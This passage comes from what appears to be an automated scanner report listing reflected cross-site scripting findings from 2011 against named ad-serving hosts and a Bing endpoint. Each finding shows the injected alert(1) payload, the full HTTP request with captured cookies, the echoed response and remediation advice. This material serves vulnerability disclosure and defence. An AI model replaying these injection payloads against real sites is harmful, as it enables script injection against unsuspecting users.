This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73ff5e8'%3balert(1)//fba03bbdfb2&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Thu, 03 Feb 2011 18:53:30 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Fri, 03-Feb-2012 18:53:31 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Fri, 03-Feb-2012 18:53:31 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73ff5e8';alert(1)//fba03bbdfb2&external_user_id=3297869551067506954"/>');

1.54. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2d68'%3balert(1)//7361267a395 was submitted in the admeld_callback parameter. This input was echoed as e2d68';alert(1)//7361267a395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche2d68'%3balert(1)//7361267a395 HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Thu, 03 Feb 2011 18:53:42 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Fri, 03-Feb-2012 18:53:42 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Fri, 03-Feb-2012 18:53:42 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matche2d68';alert(1)//7361267a395?admeld_adprovider_id=73&external_user_id=3297869551067506954"/>');

1.55. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 6c86c<script>alert(1)</script>03ede497a81 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=8797686c86c<script>alert(1)</script>03ede497a81&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:23:30 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2536


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "8797686c86c<script>alert(1)</script>03ede497a81"

   
                                                           </head>
...[SNIP]...

1.56. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 842ea--><script>alert(1)</script>48d2a0518b4 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369842ea--><script>alert(1)</script>48d2a0518b4&pid=879768&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:23:21 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3402


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1341369842ea--><script>alert(1)</script>48d2a0518b4" -->
...[SNIP]...

1.57. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 68d8c--><script>alert(1)</script>c52ad980c6e was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=879768&ps=-168d8c--><script>alert(1)</script>c52ad980c6e&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:23:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3841


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-168d8c--><script>alert(1)</script>c52ad980c6e" -->
   
...[SNIP]...

1.58. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbeb5"-alert(1)-"cefe6b77701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&dbeb5"-alert(1)-"cefe6b77701=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754832540&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F66
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 03 Feb 2011 18:53:40 GMT
Pragma: no-cache
Content-Length: 5050
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
ype = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&dbeb5"-alert(1)-"cefe6b77701=1&s=1678185&_salt=3597926079";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.59. http://ads.roiserver.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48655'%3balert(1)//ba986b9e810 was submitted in the h parameter. This input was echoed as 48655';alert(1)//ba986b9e810 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=C8EFE2E&w=728&h=9048655'%3balert(1)//ba986b9e810 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 381
Date: Thu, 03 Feb 2011 16:08:06 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728" HEIGHT="9048655';alert(1)//ba986b9e810" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.60. http://ads.roiserver.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9352f"%3balert(1)//887397266bd was submitted in the pid parameter. This input was echoed as 9352f";alert(1)//887397266bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=C8EFE2E9352f"%3balert(1)//887397266bd&w=728&h=90 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 381
Date: Thu, 03 Feb 2011 16:07:49 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E9352f";alert(1)//887397266bd&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728" HEIGHT="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.61. http://ads.roiserver.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d76ed'%3balert(1)//7fc95e77677 was submitted in the w parameter. This input was echoed as d76ed';alert(1)//7fc95e77677 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=C8EFE2E&w=728d76ed'%3balert(1)//7fc95e77677&h=90 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 381
Date: Thu, 03 Feb 2011 16:07:54 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728d76ed';alert(1)//7fc95e77677" HEIGHT="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.62. http://ads.specificmedia.com/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9934'-alert(1)-'9b44b809a0d was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0e9934'-alert(1)-'9b44b809a0d HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:37 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:37 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 370
Expires: Wed, 02 Feb 2011 18:53:37 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=10980;c=132574;b=786159;ts=20110203135337;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0e9934'-alert(1)-'9b44b809a0d;cxt=99061898:2148402-10000150:2148402" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.63. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15f9d'-alert(1)-'2c3bcbaf79d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0&15f9d'-alert(1)-'2c3bcbaf79d=1 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:38 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:38 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 373
Expires: Wed, 02 Feb 2011 18:53:38 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=10980;c=132574;b=786159;ts=20110203135338;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0&15f9d'-alert(1)-'2c3bcbaf79d=1;cxt=99061898:2148402-10000150:2148402" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.64. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4b7"-alert(1)-"af13f1e484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1421534&banned_pop_types=28&pop_times=1&pop_frequency=86400&fa4b7"-alert(1)-"af13f1e484=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:03:28 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 03 Feb 2011 16:03:28 GMT
Pragma: no-cache
Content-Length: 4400
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1421534; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=28&fa4b7"-alert(1)-"af13f1e484=1&s=1421534&_salt=3329141379";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.65. http://./qsonhs.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://.
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 was submitted in the q parameter. This input was echoed as d1d97<img src=a onerror=alert(1)>37234bbbf48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIW&q=d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 HTTP/1.1
Host: .
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=online+banking&go=&form=QBLH&qs=n&sk=&sc=8-10
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; _FP=; _HOP=; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM; RMS=F=G; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 2284389bc6f9439a8eeedd3f98885c17
Date: Thu, 03 Feb 2011 13:42:59 GMT
Connection: close

{"AS":{"Query":"d1d97<img src=a onerror=alert(1)>37234bbbf48","FullResults":1}}

1.66. http://as00.estara.com/as/InitiateCall2.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/InitiateCall2.php

Issue detail

